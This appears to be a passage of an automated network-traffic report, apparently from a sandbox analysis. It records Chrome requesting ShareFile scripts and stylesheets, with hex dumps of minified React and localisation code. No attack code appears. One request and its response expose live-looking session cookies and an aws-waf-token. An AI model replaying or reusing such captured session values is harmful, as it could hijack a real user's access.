                                                                                                                                                                                                                      X-Amz-Cf-Id: HEHbqTa0pGozGqfeb4aOQJYvzA97YvBYUpls6J41LgjvKcAr36TtGA==
                                                                                                                                                                                                                      Age: 4
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC15862INData Raw: 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 5b 74 5d 3d 65 5b 74 5d 7d 29 29
                                                                                                                                                                                                                      Data Ascii: System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC16384INData Raw: 38 31 56 39 2e 32 32 22 2c 73 74 72 6f 6b 65 3a 74 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 31 2e 35 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 7d 29 29 7d 29 2c 7b 72 65 70 6c 61 63 65 43 6f 6c 6f 72 3a 21 30 7d 29 7d 2c 34 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 35 34 29 2c 6f 3d 28 30 2c 6e 28 31 31 33 39 29 2e 49 29 28 22 53 70 69 6e 6e 65 72 49 63 6f 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 75 6e 64 65 66 69 6e 65 64 3b 72 65 74 75 72 6e 20 72 5b 22 64 65 66 61 75 6c 74 22 5d
                                                                                                                                                                                                                      Data Ascii: 81V9.22",stroke:t,strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}),{replaceColor:!0})},48:(e,t,n)=>{"use strict";n.d(t,{L:()=>o});var r=n(5954),o=(0,n(1139).I)("SpinnerIcon",(function(e){arguments.length>1&&undefined;return r["default"]
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC16384INData Raw: 6f 77 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 63 69 c3 b3 6e 20 64 65 20 66 6c 75 6a 6f 20 64 65 20 74 72 61 62 61 6a 6f 22 2c 45 70 73 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 45 50 53 22 2c 45 78 63 65 6c 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 45 78 63 65 6c 22 2c 46 69 6c 65 62 6f 78 49 63 6f 6e 3a 22 43 61 6a 61 20 64 65 20 61 72 63 68 69 76 6f 73 22 2c 46 6c 61 73 68 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 46 6c 61 73 68 22 2c 46 6f 6c 64 65 72 49 63 6f 6e 3a 22 43 61 72 70 65 74 61 22 2c 49 6c 6c 75 73 74 72 61 74 6f 72 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 49 6c 6c 75 73 74 72 61 74 6f 72 22 2c 49 6d 61 67 65 73 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 64 65 20 69 6d 61 67 65 6e 22 2c 49 6e 64 65 73 69 67 6e 49 63 6f 6e 3a 22 41 72 63 68
                                                                                                                                                                                                                      Data Ascii: owIcon:"Ilustracin de flujo de trabajo",EpsIcon:"Archivo EPS",ExcelIcon:"Archivo Excel",FileboxIcon:"Caja de archivos",FlashIcon:"Archivo Flash",FolderIcon:"Carpeta",IllustratorIcon:"Archivo Illustrator",ImagesIcon:"Archivo de imagen",IndesignIcon:"Arch
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC16384INData Raw: 3a 7b 63 61 6e 6e 6f 74 42 65 42 65 74 77 65 65 6e 45 72 72 6f 72 3a 22 e6 95 b0 e5 ad 97 e3 82 92 7b 7b 6d 69 6e 7d 7d ef bd 9e 7b 7b 6d 61 78 7d 7d e3 81 ae e9 96 93 e3 81 a7 e6 8c 87 e5 ae 9a e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a7 e3 81 8d e3 81 be e3 81 9b e3 82 93 22 2c 63 61 6e 6e 6f 74 42 65 45 71 75 61 6c 45 72 72 6f 72 3a 22 7b 7b 6e 75 6d 62 65 72 7d 7d e3 82 92 e6 8c 87 e5 ae 9a e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a7 e3 81 8d e3 81 be e3 81 9b e3 82 93 22 2c 6d 75 73 74 42 65 42 65 74 77 65 65 6e 45 72 72 6f 72 3a 22 e6 95 b0 e5 ad 97 e3 81 af 7b 7b 6d 69 6e 7d 7d ef bd 9e 7b 7b 6d 61 78 7d 7d e3 81 ae e9 96 93 e3 81 a7 e6 8c 87 e5 ae 9a e3 81 97 e3 81 a6 e3 81 8f e3 81 a0 e3 81 95 e3 81 84 22 2c 6d 75 73 74 42 65
                                                                                                                                                                                                                      Data Ascii: :{cannotBeBetweenError:"{{min}}{{max}}",cannotBeEqualError:"{{number}}",mustBeBetweenError:"{{min}}{{max}}",mustBe
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC16384INData Raw: d1 80 d0 b8 d0 bb d0 be d0 b6 d0 b5 d0 bd d0 b8 d1 8f 22 2c 45 6d 70 74 79 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 3a 22 d0 98 d0 bb d0 bb d1 8e d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 ba d0 be d0 bc d0 bc d0 b5 d0 bd d1 82 d0 b0 d1 80 d0 b8 d0 b5 d0 b2 22 2c 45 6d 70 74 79 43 6f 6d 70 6c 65 74 65 49 63 6f 6e 3a 22 d0 98 d0 bb d0 bb d1 8e d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d1 82 d0 be d0 b3 d0 be 2c 20 d1 87 d1 82 d0 be 20 d0 b2 d1 81 d0 b5 20 d1 8d d0 bb d0 b5 d0 bc d0 b5 d0 bd d1 82 d1 8b 20 d0 be d0 b1 d1 80 d0 b0 d0 b1 d0 be d1 82 d0 b0 d0 bd d1 8b 22 2c 45 6d 70 74 79 43 6f 6d 70 75 74 65 72 49 63 6f 6e 3a 22 d0 98 d0 bb d0 bb d1 8e d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 ba d0 be d0 bc d0 bf d1 8c d1 8e d1 82 d0 b5 d1 80 d0 b0
                                                                                                                                                                                                                      Data Ascii: ",EmptyCommentsIcon:" ",EmptyCompleteIcon:" , ",EmptyComputerIcon:"
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC16384INData Raw: 79 6c 65 73 2b 22 7d 22 3a 74 2e 73 74 79 6c 65 73 2c 28 30 2c 6c 2e 71 29 28 28 30 2c 73 2e 4d 59 29 28 6f 29 2c 79 29 2c 72 26 26 28 45 2e 69 6e 73 65 72 74 65 64 5b 74 2e 6e 61 6d 65 5d 3d 21 30 29 7d 3b 76 61 72 20 45 3d 7b 6b 65 79 3a 74 2c 73 68 65 65 74 3a 6e 65 77 20 72 2e 6d 28 7b 6b 65 79 3a 74 2c 63 6f 6e 74 61 69 6e 65 72 3a 61 2c 6e 6f 6e 63 65 3a 65 2e 6e 6f 6e 63 65 2c 73 70 65 65 64 79 3a 65 2e 73 70 65 65 64 79 2c 70 72 65 70 65 6e 64 3a 65 2e 70 72 65 70 65 6e 64 2c 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 3a 65 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 7d 29 2c 6e 6f 6e 63 65 3a 65 2e 6e 6f 6e 63 65 2c 69 6e 73 65 72 74 65 64 3a 75 2c 72 65 67 69 73 74 65 72 65 64 3a 7b 7d 2c 69 6e 73 65 72 74 3a 69 7d 3b 72 65 74 75 72 6e 20 45 2e
                                                                                                                                                                                                                      Data Ascii: yles+"}":t.styles,(0,l.q)((0,s.MY)(o),y),r&&(E.inserted[t.name]=!0)};var E={key:t,sheet:new r.m({key:t,container:a,nonce:e.nonce,speedy:e.speedy,prepend:e.prepend,insertionPoint:e.insertionPoint}),nonce:e.nonce,inserted:u,registered:{},insert:i};return E.
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC4981INData Raw: 69 6e 73 65 72 74 65 64 5b 74 2e 6e 61 6d 65 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 61 3d 74 3b 64 6f 7b 65 2e 69 6e 73 65 72 74 28 74 3d 3d 3d 61 3f 22 2e 22 2b 72 3a 22 22 2c 61 2c 65 2e 73 68 65 65 74 2c 21 30 29 2c 61 3d 61 2e 6e 65 78 74 7d 77 68 69 6c 65 28 61 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7d 7d 7d 2c 31 30 33 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 74 2e 68 61 73 28 6e 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 6e 29 3b 76 61 72 20 72 3d 65 28 6e 29 3b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: inserted[t.name]===undefined){var a=t;do{e.insert(t===a?"."+r:"",a,e.sheet,!0),a=a.next}while(a!==undefined)}}},1034:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var r=function(e){var t=new WeakMap;return function(n){if(t.has(n))return t.get(n);var r=e(n);retu
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC16384INData Raw: 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 62 28 22 61 63 74 69 6f 6e 22 2c 65 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 66 61 75 6c 74 54 61 72 67 65 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 62 28 22 74 61 72 67 65 74 22 2c 65 29 3b 69 66 28 74 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 74 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 66 61 75 6c 74 54 65 78 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 62 28 22 74 65 78 74 22 2c 65 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 2e 64 65 73 74 72 6f 79 28 29 7d 7d 5d 2c
                                                                                                                                                                                                                      Data Ascii: lue:function(e){return b("action",e)}},{key:"defaultTarget",value:function(e){var t=b("target",e);if(t)return document.querySelector(t)}},{key:"defaultText",value:function(e){return b("text",e)}},{key:"destroy",value:function(){this.listener.destroy()}}],
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC10776INData Raw: 8c 22 2c 70 61 73 74 3a 22 25 73 e5 89 8d 22 2c 73 3a 22 e6 95 b0 e7 a7 92 22 2c 6d 3a 22 31 e5 88 86 22 2c 6d 6d 3a 22 25 64 e5 88 86 22 2c 68 3a 22 31 e6 99 82 e9 96 93 22 2c 68 68 3a 22 25 64 e6 99 82 e9 96 93 22 2c 64 3a 22 31 e6 97 a5 22 2c 64 64 3a 22 25 64 e6 97 a5 22 2c 4d 3a 22 31 e3 83 b6 e6 9c 88 22 2c 4d 4d 3a 22 25 64 e3 83 b6 e6 9c 88 22 2c 79 3a 22 31 e5 b9 b4 22 2c 79 79 3a 22 25 64 e5 b9 b4 22 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 22 64 65 66 61 75 6c 74 22 5d 2e 6c 6f 63 61 6c 65 28 72 2c 6e 75 6c 6c 2c 21 30 29 2c 72 7d 28 6e 28 37 34 38 34 29 29 7d 2c 39 31 33 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: ",past:"%s",s:"",m:"1",mm:"%d",h:"1",hh:"%d",d:"1",dd:"%d",M:"1",MM:"%d",y:"1",yy:"%d"}};return n["default"].locale(r,null,!0),r}(n(7484))},9132:function(e,t,n){e.exports=function(e){"use strict";functio
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC6396INData Raw: 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 4d 22 29 3a 61 28 65 2c 22 6d 6f 6e 74 68 73 22 29 7d 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 4d 4d 4d 22 29 3a 61 28 65 2c 22 6d 6f 6e 74 68 73 53 68 6f 72 74 22 2c 22 6d 6f 6e 74 68 73 22 2c 33 29 7d 2c 66 69 72 73 74 44 61 79 4f 66 57 65 65 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 24 6c 6f 63 61 6c 65 28 29 2e 77 65 65 6b 53 74 61 72 74 7c 7c 30 7d 2c 77 65 65 6b 64 61 79 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 66 6f 72 6d 61 74 28 22 64 64 64 64 22 29 3a 61 28 65 2c 22 77 65 65 6b 64 61 79 73 22 29 7d 2c 77 65 65 6b 64 61 79 73 4d 69 6e 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: ?t.format("MMMM"):a(e,"months")},monthsShort:function(t){return t?t.format("MMM"):a(e,"monthsShort","months",3)},firstDayOfWeek:function(){return e.$locale().weekStart||0},weekdays:function(t){return t?t.format("dddd"):a(e,"weekdays")},weekdaysMin:functio


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      129192.168.2.175359613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC576OUTGET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 12:30:04 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 edd6d90087c4f2b49e182778a2273adc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 9hAOmgDGFRuKag9KUdywgyw2LBUoGFu4uuwF9rLz8QSO_P22hSwZJQ==
                                                                                                                                                                                                                      Age: 31263
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      130192.168.2.175359713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC578OUTGET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:39:38 GMT
                                                                                                                                                                                                                      Last-Modified: Mon, 04 Dec 2023 08:50:04 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 38f6d324a75dff585b0ce25920fd4bda.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: JsB2eeGpUDpAe6RiFiWlkTdZ9B00UFHz58GOWyWCldR0wzF0Eu_eiw==
                                                                                                                                                                                                                      Age: 39409
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      131192.168.2.175359813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC581OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:39:38 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: uR4LDe962f4_EWKY6I5MGkZiIuf5G3v2Uj9gALbH4sPHcqbQYbPXLQ==
                                                                                                                                                                                                                      Age: 39409
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      132192.168.2.175359976.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1600OUTGET /bundles/50838dcfa76323d03647.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
                                                                                                                                                                                                                      2024-11-05 19:36:27 UTC1430INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:27 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 35350
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=YJdHR5ATM58qXcS9wm9r3veBvKO51LZMH1YgwF0FSaUnItbbroR2GNVYdPPOI0S0G9WOezRQqMTdfDKTXz7wu62WYyOjPuOSZt3LkP/TcFeBlbMqfcFsMTqwr+6metUcVDNDAJGsdqRpBignIpDFnE2o+VSwsjA11OaTUNx7Jjob; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=YJdHR5ATM58qXcS9wm9r3veBvKO51LZMH1YgwF0FSaUnItbbroR2GNVYdPPOI0S0G9WOezRQqMTdfDKTXz7wu62WYyOjPuOSZt3LkP/TcFeBlbMqfcFsMTqwr+6metUcVDNDAJGsdqRpBignIpDFnE2o+VSwsjA11OaTUNx7Jjob; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=MT9HTjlLxR5lFBb8ao5Ohm+SroPDRdJH3P5y/oK/J+aeVzGOJQSYhkQLTwF5CxTvgr7gvVdbuax/MLKQp8qQxNv/Qkz+0qHe9LMKGbDJG5tUEvPdeRWFkWn4iK15; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=MT9HTjlLxR5lFBb8ao5Ohm+SroPDRdJH3P5y/oK/J+aeVzGOJQSYhkQLTwF5CxTvgr7gvVdbuax/MLKQp8qQxNv/Qkz+0qHe9LMKGbDJG5tUEvPdeRWFkWn4iK15; Expires=Tue, 12 Nov 2024 19:36:27 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56ca596"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
